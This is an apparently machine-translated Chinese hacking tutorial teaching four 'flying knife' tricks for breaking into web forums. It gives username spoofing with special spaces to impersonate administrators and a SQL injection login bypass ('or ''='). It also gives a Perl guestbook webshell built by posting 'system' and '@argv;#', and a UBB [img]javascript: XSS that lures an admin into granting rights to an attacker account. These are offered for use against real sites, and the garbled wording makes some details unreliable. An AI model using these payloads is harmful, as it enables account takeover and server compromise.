Construct special characters for penetration intrusion

LCX

The Analysis of web programs on the server, such as forums and chat rooms, finds bugs or omissions in program writing, and thus carries out port 80 penetration intrusion. It seems to be just a matter of hackers. Otherwise, although we will not write programs, we can use cainiao, which constructs special characters, to penetrate port 80. Don't believe it? Well, let's look at the four Li feidao carefully crafted with special characters.

The first flying knife: A fish eye. We can use it to impersonate speeches in the Forum. I saw a girl who tried to ask her to say I love you in the forum. What should she do? Open notepad, press the tab key or the capslock + Tab key to form a special space. Copy it and place the space in the name of Meimei and register it. Ah, the name is the same as that of Meimei, and the rest is easy to do. Characters with special spaces are also AAAA, aaab, or aaac entered by the location input method. Another character is & nbsp. In the HTML Tag, It is blank. You can also use it. My experience is the AAAA/aaab/aaac input by location input method. The success rate is extremely high in ASP programs, while the tab key and & nbsp have a high success rate in PHP programs. What's more terrible is that on the wdb forum and Ibb forum, a special user name constructed with the tab key can have the same permissions as the original user. If the original user name is administrator, the impersonating user you constructed will also become Administrator.

The second Flying knife: The sky passes through the sea. In ASP dynamic network programming, login pages that verify the Administrator account and password are often provided for background management. However, there are some vulnerabilities in such authentication. For example, you can enter either 'or' = 'in the username and password boxes to go to the Management page. Why? Let me briefly describe it. Check the original program: User = request. Form ("user ")
Pass = request. Form ("pass ")
......
SQL = "select * From guestbook where user = '" & user & "' and pass = '" & pass &"'
If we enter either the user or pass values 'or ''= ', the last SQL code above will become
SQL = "select * From guestbook where user ='' or ''= 'and pass ='' or ''= '"
If you know a little about SQL statements, we can see that the input 'or' = 'meets the conditions for the program to come true, so we will be overwhelmed. This is too abstract. This vulnerability exists in the confidence Article management system. This program is used to capture the vulnerability on the Internet. Take a look at the figure. If you use the special characters provided by me, you can enter either 'or ''=' in the account and password to go to the background for management.

The third flying knife: The Dark warehouse. Recently, many articles have been published on the Internet about the intrusion into the LB Forum. without exception, they all talk about the construction of special characters. As we all know, if the system @ argv; # line of code is written in a cgi or Perl program, a webshell will be formed. Use http: // ip/*. pl? Dir will see the physical directory of the website (*. pl file contains system @ argv; # This line of code ). For example, agbii is a free CGI message book, which is very popular on the Internet. The messages you leave in this message book are arranged by the number, user name, title, and content of the n-th message, in addition, the N messages are sent to the data/user name in a fixed directory. It seems complicated to say. See the figure.
For example, if I leave a message, it is the first message in the message book of this website. The user name I use is: System, and the title is @ argv; #. The content is Haha, so 10 in the data/222 directory. the PL file content is:

, Carefully read the figure for signing the message. The user of this message book is 222. Then we run http: // 192.168.1.3/book/data/222/10 .pl? Dir will get a shell.

The fourth flying knife: Taigong fishing. This is an interesting and difficult way to use, that is, cross-site scripting attacks. Let me talk about the methods that cainiao can use. It is interesting to say that in the UBB code, There is a bug in the code we post in the Forum. In [img] [/img], if you insert a Javascript script instead of an image, it will also execute. We will post a post in the forum with the following content: [img] javascript: Alert (" xx") [/img]. When you click this post, a JS conversation will pop up, upload the hacker's X file.

Write [img] javascript: Alert (" xx"); self. open ("http: // URL") [/img]. After the dialog box is displayed, a new webpage window is opened. What if we put a webpage trojan in this webpage? Here we will not talk about webpage Trojans. If the URL for adding an administrator hack to this forum is http: // ip/BBS/upadmin? User = hack. Of course, this URL must be executed as an administrator. Therefore, we write this URL and then seduce the real administrator of this forum to view the post, after the administrator who has logged on to the Forum clicks this post, the normal registered user of hack will become the administrator of the Forum. Similarly, you can upload attachments. We upload a TXT attachment. The TXT file contains the URL of the hack administrator. Due to the bug in IE browser, as long as the file in the server website file is an HTML code, it executes the HTML webpage, I don't care what the suffix is. The administrator can click the TXT attachment to add the URL of the hack administrator. As for the HTML and ripct codes in the [img] [/img] or TXT files, we can carefully construct them so that the forum administrator does not notice that he has executed some URL programs after clicking them.

The final explanation shows that these four flying knives are not very sharp. Each server can use a knife to seal the throat. However, for most online forums, chat rooms, or other Web applications, or ...... that sentence ...... xiao Li Fei Dao is a secret.